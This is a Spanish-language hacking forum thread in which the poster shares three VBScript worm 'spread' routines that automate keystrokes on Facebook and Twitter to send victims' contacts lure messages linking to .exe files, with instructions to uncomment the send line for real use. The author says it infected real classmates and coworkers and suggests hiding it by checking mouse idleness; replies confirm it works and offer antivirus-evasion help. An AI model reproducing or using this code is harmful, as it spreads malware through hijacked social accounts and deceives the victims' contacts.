[VBS] [SOURCE] Facebook y Twitter Spread

Iniciado por Mad Antrax, 4 Marzo 2014, 23:26 PM

0 Miembros y 3 Visitantes están viendo este tema.

Mad Antrax

Hola a todos

Como algunos ya habréis visto, estoy retomando mis tiempos mozos de programación. Ando liado desarrollando virus, troyanos y gusanos. Hoy vengo a compartir 3 funciones de Spread que permitirán reproducir una infección vírica usando Facebook (2 métodos) y Twitter (1 método)

El funcionamiento es muy simple. Primero de todo se tienen que dar unas circunstancias para que el "spread" sea efectivo, he realizado pruebas con usuarios reales y me he quedado asombrado con la efectividad de éste "spread". El código se aprovecha de los atajos de teclado que hay en las web's de FB y TW. Eso significa que si cambian los atajos, la función dejará de funcionar... Empecemos con la primera:

Spread usando mensajes personales de Facebook

Primero de todo, os contaré las pulsaciones que ejecuta el script para que las podáis testear en vuestro propio FB, es muy fácil:

1. Entra en www.facebook.com
2. Inicia sesión en tu perfil
3. Pulsa la combinación de teclas: ALT+M
4. Pulsa una tecla (la letra C por ejemplo)
5. Pulsa Enter y Tabulador
6. Escribe un texto y pulsa Enter

Si lo has hecho bien, verás que has enviado un mensaje a un contacto de tu lista de amigos. Pues bien, el script automatiza todas esas acciones en el PC de la víctima:

Código (vb) [Seleccionar]
Set WS = CreateObject("WScript.Shell")
call fb_msg_spread("holaa, te he etiquetado en esta foto http://www.servidor.com/mifoto.exe")

Function FB_MSG_Spread(X)
Randomize
C = Chr(Int(rnd*26)+97)

WS.run "http://www.facebook.com"
WScript.Sleep 5000

WS.SendKeys "%m"
WScript.Sleep 500

For i = 1 to Int(rnd*5)+2
WS.SendKeys C
WScript.Sleep 500
WS.SendKeys "{ENTER}"
Next

WScript.Sleep 500
WS.SendKeys "{TAB}"
WScript.Sleep 500
WS.SendKeys X
WScript.Sleep 500
'WS.SendKeys "{ENTER}"
End Function


Copiad ese código TAL CUAL en un fichero de texto y lo guardáis como VBS. La última linea esta comentada, por lo que no os preocupéis, no se va a mandar ningún mensaje a ningún contacto vuestro.

Ahora ejecutad el fichero y mirar como se reproduce la secuencia de comandos. El script calcula una letra al azar y la utiliza para enviar el mensaje a varios contactos simultaneamente. Para utilizar éste código de forma real, quita el comentario de la última línea y ya tendrás un estupendo spread por Facebook.



Spread usando noticias del muro de Facebook

Éste metodo es parecido al anterior, pero utiliza las teclas J y C para buscar una noticia al azar y enviar el comentario:

Código (vb) [Seleccionar]
Set WS = CreateObject("WScript.Shell")
call fb_txt_spread("ei, creo que te han etiquetado sin tu permiso! http://www.servidor.com/lafoto.exe")

Function FB_TXT_Spread(X)
Randomize

WS.run "http://www.facebook.com"
WScript.Sleep 5000

For i = 1 to Int(rnd*5)+1
WS.SendKeys "j"
WScript.Sleep 800
Next

WS.SendKeys "c"
WScript.Sleep 800
WS.SendKeys X
WScript.Sleep 500
'WS.SendKeys "{ENTER}"
WScript.Sleep 500
WS.SendKeys "{TAB}"
WScript.Sleep 500
WS.SendKeys "{TAB}"
WScript.Sleep 500
WS.SendKeys "j"
End Function


De igual modo que en el ejemplo anterior, podéis ejecutar éste script ya que la tecla ENTER está comentada y no hay riesgo. Para utilizar el script en un entorno real, quitad el comentario.



Spread usando un tweet en Twitter

Lo mismo que los anteriores casos, utilizando la tecla M para mandar un tweet:

Código (vb) [Seleccionar]
Set WS = CreateObject("WScript.Shell")
call tw_txt_spread("Acabo de publicar un album de fotos http://www.servidor.com/photo_album.exe")

Function TW_TXT_Spread(X)
Randomize

WS.run "http://www.twitter.com"
WScript.Sleep 6000

WS.SendKeys "n"
WScript.Sleep 800
WS.SendKeys X
WScript.Sleep 500
WS.SendKeys "{TAB}"
WScript.Sleep 500
'WS.SendKeys "{ENTER}"
End Function


Podéis probar el código, ya que la tecla ENTER también está comentada.






Bueno, espero que os haya gustado y que haya quedado clara mi explicación. Insisto, los script que he puesto los podéis probar en vuestro PC, ya que la línea que envía el mensaje a los contactos está deshabilitada con el comentario, así que no hay riesgo.

Saludos!! :D
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

noele1995

Buen code como siempre, ingenioso y sencillo. Ultimamente se explota mucho el potencial de vbs por lo que veo.

Saludos

Mad Antrax

Cita de: noele1995 en  5 Marzo 2014, 00:30 AM
Buen code como siempre, ingenioso y sencillo. Ultimamente se explota mucho el potencial de vbs por lo que veo.

Saludos

Lo has probado? Te ha funcionado? Mañana lo probaré en otras maquinas con SO y web-browsers diferentes a ver si detecto algun bug.

Gracias! :D

PD: vbs tiene la facilidad de ser fácilmente programable y encriptable, obtienes grandes resultados con solo unos pocos bytes. Yo adoro VB6 y VBS

:D
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

noele1995

He probado los dos de facebook Win7 con el Chrome y funcionan.Estoy impaciente por ver el cactus trojan :)

portaro

Jolín hace tiempos que no veia por aqui a Antrax, puff buenos tiempos en que andaba purgando web a ver que escribiay tutos, aún esta tu página me acuerdo que no la conseguia encontrar de las ultimas veces que buscaba, aún tengo algunos pdfs de tus tutos amigo.

Todo un lujo verte de nuevo por aqui, aunque yo más bien aprendi poco eheh me pase a Linux y esas cosillas eheh.

A ver si paso más por aqui a ver si pones material. ;D (droja de la buena ehehe)


Siscu.cab

#5
Waaa explicanos mas   :o

79137913

HOLA!!!

Me parecio medio chapucero el codigo, aunque en su mayoria funcionan...

El de mensaje no funciona bien en firefox winxp.

el resto andan de diez, aunque podrias haber hecho algo mas en segundo plano.

Si queres tengo un codigo que funciona con winsocks en vbs y anda muy bien y tengo una tactica para hacer "FUD" casi cualquier codigo en VBS.

GRACIAS POR LEER!!!
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

79137913                          *Shadow Scouts Team*

Mad Antrax

Cita de: 79137913 en  7 Marzo 2014, 17:19 PM
HOLA!!!

Me parecio medio chapucero el codigo, aunque en su mayoria funcionan...

El de mensaje no funciona bien en firefox winxp.

el resto andan de diez, aunque podrias haber hecho algo mas en segundo plano.

Si queres tengo un codigo que funciona con winsocks en vbs y anda muy bien y tengo una tactica para hacer "FUD" casi cualquier codigo en VBS.

GRACIAS POR LEER!!!

El codigo es sencillo y "chapucero", evidentemente se puede implementar de formas más eficaces, ésto es solo una prueba de concepto. Yo le agregaría una función que compruebe las cookies locales para ver si el usuario está logeado en Facebook/Twitter y luego una función que detecte si el usuario está delante de la pantalla o no, por ejemplo comprobando la posición del Mouse a intervalos de 5 minutos, si el mouse no se mueve pues lanzar el spread para que nadie lo vea.

Insisto que lo he probado con varios usuarios del instituo y del trabajo. El gusano se expandió por la red en cuestión de horas. Tuve que eliminar el fichero de descarga para detener la infección.

Es un método un poco brusco y "chapucero", pero funciona que da miedo :D
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

daryo

genial  ;D , es increible que la gente sea tan ingenua de abrir las fotos.exe xD o o la foto.gif.exe
buenas

Kami

Amores, no habéis pensado en usar la API?....

Si necesitas ayuda para hacerla... yo te ayudo...